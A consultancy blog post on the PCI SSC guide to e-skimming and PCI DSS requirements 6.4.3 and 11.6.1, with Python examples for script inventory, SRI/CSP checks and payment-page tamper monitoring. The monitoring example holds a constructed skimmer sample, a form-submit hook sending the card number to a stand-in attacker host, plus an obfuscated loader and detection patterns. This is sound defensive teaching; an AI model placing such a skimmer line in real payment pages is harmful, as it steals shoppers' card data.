More Protection Against E-Skimming - PCI Council Publishes New Guide to PCI DSS Requirements 6.4.3 and 11.6.1

14 March 2025

The PCI Security Standards Council (PCI SSC) has published a new guide: “Payment Page Security and Preventing E-Skimming - Guidance for PCI DSS Requirements 6.4.3 and 11.6.1”. This document provides merchants and service providers with guidance on implementing controls to protect payment card data in e-commerce transactions.

E-skimming - a growing threat

E-skimming, the injection of malicious JavaScript into a payment page so that card data is copied out of the shopper's browser while the legitimate transaction completes normally, is an ever-increasing threat to the security of credit card data.
To mitigate this risk as effectively as possible, the scripts used on payment pages must be actively managed and their integrity continuously monitored.

For this very purpose, the PCI SSC introduced the new requirements 6.4.3 and 11.6.1 with version 4.0 of the PCI DSS as future-dated requirements; they become mandatory on 31 March 2025:

Requirement 6.4.3 specifies how all scripts loaded and executed on payment pages, including those obtained from third parties, must be managed: each script must be authorized, its integrity must be assured, and it must be inventoried with a written justification for why it is needed.

Requirement 11.6.1 requires a change- and tamper-detection mechanism that alerts on unauthorized modification of the HTTP headers and the contents of payment pages as received by the consumer's browser.

Concrete guidance for affected companies

The E-Commerce Guidance Task Force, which developed the document, consisted of PCI SSC staff, representatives of the payment brands, and members of the Board of Advisors/Technical Advisory Board, the Global Executive Assessor Roundtable (GEAR) and the Small Merchant Business (SMB) Task Force.

Our colleague Hendrik Diederich, Senior Security Consultant and PCI Auditor, contributed to the new guidance as a member of the E-Commerce Guidance Task Force.

As security experts and auditors, we naturally see the growing risk of e-skimming and therefore also the need for the two new requirements. However, we are also aware of the challenge that implementing the requirements poses for many companies. With the task force's new guidance, we want to provide them with concrete assistance.

Hendrik Diederich, expert in PCI DSS and protection against e-skimming

What our expert recommends

Among the topics addressed in the new guidance, two are in our expert's view of particular interest to companies: scoping and implementation.

Scoping: Who must fulfill requirements 6.4.3 and 11.6.1?

  • In the new version of SAQ A, both requirements have been removed; instead, new eligibility criteria have been added that a merchant must meet in order to use SAQ A as its validation method.
    (You can find more information on this in our news blog: https://www.usd.de/en/update-pci-saq-a-2025/)
  • The requirements apply to all scripts involved in processing payments, for example scripts that post card data straight from the browser to the payment service provider (direct post).
  • The requirements also apply to all other scripts running on the page where the payment is made, regardless of their function.
  • If the redirect to a payment service provider is performed by a script, that script is also in scope.

Implementation: How can companies meet the requirements?

Requirement 6.4.3:

  • Authorization: Name and document who is authorized to approve the use of a script on the payment page (for example, as a step in the development or change process), so that no script goes live without an explicit approval.
  • Inventory: Document every script used, including the reason why it is needed.
  • Integrity: Use CSP (hash or nonce sources in script-src), SRI (the integrity attribute on script tags) or a proxy-based solution to ensure that only the approved version of each script can execute in the browser.
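As an added illustration of what the three 6.4.3 controls look like when they are checked automatically, the following script was written for this post; it is not code from the PCI SSC guide or from usd AG. It keeps a script inventory (approver, justification, approved SRI value), parses a rendered checkout page, reports every script that is missing from the inventory or whose integrity is not pinned, and derives a CSP script-src directive that allows only the inventoried external scripts plus the exact inline scripts on the page. All hostnames, script bodies, inventory entries and approver roles are constructed assumptions.

```python
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(body: bytes, alg: str = "sha384") -> str:
    """Subresource Integrity value for a script body: '<alg>-<base64 digest>'."""
    return f"{alg}-{base64.b64encode(hashlib.new(alg, body).digest()).decode()}"


def csp_hash_source(body: bytes) -> str:
    """CSP hash-source for an inline script: allows exactly this script in
    script-src without resorting to 'unsafe-inline'."""
    return f"'{sri_hash(body, 'sha256')}'"


class ScriptCollector(HTMLParser):
    """Collects every <script> element on a page with its attributes and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = {"attrs": dict(attrs), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def check_payment_page(html: str, inventory: dict, page_origin: str):
    """Applies the 6.4.3 controls to one rendered payment page. Returns (findings,
    script_src): findings lists scripts that are not inventoried/authorized or whose
    integrity is not pinned; script_src is a CSP directive for the approved set."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings, sources = [], ["'self'"]
    for script in parser.scripts:
        attrs, src = script["attrs"], script["attrs"].get("src")
        if src is None:
            # Inline script: pin it by hash so that any modification is blocked by CSP.
            sources.append(csp_hash_source(script["body"].encode()))
            continue
        entry = inventory.get(src)
        if entry is None:
            findings.append(f"{src}: not in the script inventory (no approval, no documented justification)")
            continue
        integrity = attrs.get("integrity")
        if not integrity:
            findings.append(f"{src}: no integrity attribute; the browser runs whatever the host serves")
        elif integrity != entry["integrity"]:
            findings.append(f"{src}: integrity mismatch; the page references a version other than the approved one")
        if not src.startswith(page_origin) and attrs.get("crossorigin") is None:
            findings.append(f'{src}: cross-origin script needs crossorigin="anonymous" (an opaque no-cors response cannot be integrity-checked)')
        sources.append(src)
    return findings, "script-src " + " ".join(sources)


PAGE_ORIGIN = "https://shop.example.test"  # assumption: the merchant's checkout origin
# Constructed script bodies, as reviewed when the scripts were approved.
APPROVED_CHECKOUT_JS = b"window.PSP={mount:function(el){/* loads the PSP card-entry iframe */}};"
APPROVED_APP_JS = b"document.getElementById('total').textContent=window.order.total;"
# Constructed 6.4.3 inventory: each permitted script, why it is needed, who approved
# it (hypothetical roles), and the SRI value of the approved version.
INVENTORY = {
    "https://js.example-psp.test/checkout.js": {
        "justification": "Mounts the PSP card-entry iframe; the only script allowed to touch card data",
        "approved_by": "Payment security owner",
        "integrity": sri_hash(APPROVED_CHECKOUT_JS),
    },
    "https://shop.example.test/static/app.js": {
        "justification": "Renders the order summary on the checkout page",
        "approved_by": "Release manager",
        "integrity": sri_hash(APPROVED_APP_JS),
    },
}
# Constructed checkout page: one compliant script, one inventoried script without SRI,
# one script nobody approved, and one inline script.
SAMPLE_PAGE = f"""<html><head>
<script src="https://js.example-psp.test/checkout.js"
        integrity="{sri_hash(APPROVED_CHECKOUT_JS)}" crossorigin="anonymous"></script>
<script src="https://shop.example.test/static/app.js"></script>
<script src="https://analytics.example.test/tag.js"></script>
<script>window.order={{total:"42.00 EUR"}};</script>
</head><body><form id="payment"></form></body></html>"""

if __name__ == "__main__":
    findings, directive = check_payment_page(SAMPLE_PAGE, INVENTORY, PAGE_ORIGIN)
    for finding in findings:
        print("FINDING:", finding)
    print("Content-Security-Policy:", directive)
```

Run against the rendered page (not the template) before each release: the untracked analytics tag and the unpinned app.js come out as findings, and the generated directive can be served as the Content-Security-Policy header. The inventory dict is the record an assessor will ask for; whenever an approved script legitimately changes, its SRI value is re-approved there first, which is exactly the authorization step the requirement calls for.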

Requirement 11.6.1:

  • The following components and aspects of the page on which payments are made should be monitored:
    • HTTP headers that affect the security of the payment page (for example Content-Security-Policy and Strict-Transport-Security)
    • Changes to the contents of the scripts loaded on the page
    • Indicators that script content has been compromised (for example newly injected code that reads the card form or sends data to an unknown host)
  • There must be an alerting mechanism that fires when a change or compromise is detected. This can be built on CSP violation reporting (report-to / report-uri), a proxy-based solution or the existing monitoring solution.
  • Frequency: at least every seven days, or at the interval determined by the Targeted Risk Analysis (TRA)
    (You can find more information on TRA in our news blog: https://www.usd.de/en/targeted-risk-analysis-pci-dss/)
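As an added example of how the monitored aspects and the alerting described above fit together, the following script was written for this post; it is not code from the PCI SSC guide or from usd AG. It compares an approved baseline snapshot of the payment page (security-relevant response headers, the set of scripts and a hash of each script body) with a current snapshot, runs a few compromise indicators over the current script contents, and turns CSP violation reports, in both the Reporting API format used by report-to and the legacy report-uri format, into alerts. The header list, indicator patterns, hostnames, snapshots and report payloads are all constructed assumptions.

```python
import hashlib
import json
import re

# Response headers (lowercased) whose change can weaken the payment page's protection.
MONITORED_HEADERS = ("content-security-policy", "content-security-policy-report-only",
                     "strict-transport-security", "x-frame-options")
# Compromise indicators for script content. Constructed for this example; a real
# deployment tunes them against its own approved scripts to avoid false alarms.
INDICATORS = (
    ("obfuscation call", re.compile(r"\b(eval|unescape)\s*\(")),
    ("image beacon exfiltration", re.compile(r"new\s+Image\(\)\.src\s*=")),
    ("form submit hook", re.compile(r"addEventListener\(\s*['\"]submit['\"]")),
)


def digest(snapshot: dict) -> dict:
    """Reduces a snapshot {"headers": {...}, "scripts": {src: body}} to what gets
    compared: the monitored header values and a SHA-256 of each script body."""
    return {"headers": {h: snapshot["headers"].get(h) for h in MONITORED_HEADERS},
            "scripts": {src: hashlib.sha256(body.encode()).hexdigest()
                        for src, body in snapshot["scripts"].items()}}


def compare(baseline: dict, current: dict) -> list:
    """(severity, message) alerts for every difference from the approved baseline,
    plus indicator hits in the current script bodies."""
    alerts, base, cur = [], digest(baseline), digest(current)
    for name in MONITORED_HEADERS:
        if base["headers"][name] != cur["headers"][name]:
            alerts.append(("high", f"header changed: {name}: "
                                   f"{base['headers'][name]!r} -> {cur['headers'][name]!r}"))
    for src in sorted(cur["scripts"].keys() - base["scripts"].keys()):
        alerts.append(("high", f"unapproved script added: {src}"))
    for src in sorted(base["scripts"].keys() - cur["scripts"].keys()):
        alerts.append(("medium", f"approved script missing: {src}"))
    for src in sorted(base["scripts"].keys() & cur["scripts"].keys()):
        if base["scripts"][src] != cur["scripts"][src]:
            alerts.append(("high", f"script content changed: {src}"))
    for src, body in current["scripts"].items():
        for label, pattern in INDICATORS:
            if pattern.search(body):
                alerts.append(("high", f"compromise indicator '{label}' in {src}"))
    return alerts


def alerts_from_csp_reports(payload: str, payment_paths=("/checkout",)) -> list:
    """Normalises CSP violation reports (the list the Reporting API posts to a report-to
    endpoint, or the single {"csp-report": ...} object posted to report-uri) and alerts
    on every violation raised on a payment page."""
    data = json.loads(payload)
    alerts = []
    for report in (data if isinstance(data, list) else [data]):
        if "csp-report" in report:                    # legacy report-uri format
            body = report["csp-report"]
            doc, blocked, directive = (body.get("document-uri"), body.get("blocked-uri"),
                                       body.get("effective-directive"))
        elif report.get("type") == "csp-violation":   # Reporting API format
            body = report.get("body", {})
            doc, blocked, directive = (body.get("documentURL"), body.get("blockedURL"),
                                       body.get("effectiveDirective"))
        else:
            continue
        if doc and any(doc.split("?")[0].endswith(p) for p in payment_paths):
            alerts.append(("high", f"CSP {directive} violation on {doc}: blocked {blocked}"))
    return alerts


# Constructed baseline: the approved page as recorded after the last 6.4.3 approval.
BASELINE = {
    "headers": {"content-security-policy": "default-src 'self'; script-src 'self' https://js.example-psp.test; report-to csp",
                "strict-transport-security": "max-age=31536000; includeSubDomains"},
    "scripts": {"https://js.example-psp.test/checkout.js": "window.PSP={mount:function(el){/* PSP iframe */}};",
                "https://shop.example.test/static/app.js": "document.getElementById('total').textContent=window.order.total;"},
}
# Constructed snapshot of the same page after a skimmer injection: CSP weakened,
# app.js extended with an exfiltration hook, an extra loader from an attacker host.
COMPROMISED = {
    "headers": {"content-security-policy": "default-src 'self'; script-src 'self' 'unsafe-inline' https:",
                "strict-transport-security": BASELINE["headers"]["strict-transport-security"]},
    "scripts": {
        "https://js.example-psp.test/checkout.js": BASELINE["scripts"]["https://js.example-psp.test/checkout.js"],
        "https://shop.example.test/static/app.js": BASELINE["scripts"]["https://shop.example.test/static/app.js"]
            + "document.getElementById('payment').addEventListener('submit',function(){"
              "new Image().src='https://stats.example-evil.test/c?d='+btoa(document.forms[0].cardnumber.value);});",
        "https://stats.example-evil.test/loader.js": "eval(unescape('%66%65%74%63%68'));",
    },
}
# Constructed Reporting API payload, as a browser POSTs it to the report-to endpoint
# when the baseline CSP blocks the attacker's loader on the checkout page.
REPORT_TO_PAYLOAD = json.dumps([{
    "type": "csp-violation", "age": 12, "url": "https://shop.example.test/checkout", "user_agent": "Mozilla/5.0",
    "body": {"documentURL": "https://shop.example.test/checkout", "effectiveDirective": "script-src",
             "blockedURL": "https://stats.example-evil.test/loader.js", "disposition": "enforce", "statusCode": 200},
}])

if __name__ == "__main__":
    for severity, message in compare(BASELINE, COMPROMISED) + alerts_from_csp_reports(REPORT_TO_PAYLOAD):
        print(f"[{severity}] {message}")
```

Two points from this design matter in practice. The snapshot must be taken the way a consumer's browser sees the page (through the CDN and any proxy, with the scripts actually fetched), since a skimmer that only lives at the edge is invisible to a check of the origin server; and the comparison must run on a schedule that meets the requirement, at least every seven days or at the interval justified in the TRA, with the baseline updated only through the 6.4.3 approval process so that the monitor never silently learns a compromised page as the new normal.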


Do you need help preparing for or implementing PCI DSS in your company? Get in touch – our experts are happy to help.
